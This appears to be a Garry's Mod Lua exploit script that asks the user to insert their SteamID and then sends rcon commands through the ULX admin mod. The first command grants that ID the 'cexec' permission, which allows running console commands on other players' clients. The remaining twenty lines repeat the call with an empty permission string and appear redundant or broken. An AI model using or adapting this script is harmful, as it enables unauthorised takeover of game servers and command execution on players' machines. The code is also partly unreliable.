id = "STEAM_0:0:4727797"
-- put ur id here ^^


RunConsoleCommand("rcon", "ulx", "userallowid", id, "ulx cexec", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")
RunConsoleCommand("rcon", "ulx", "userallowid", id, "", "*")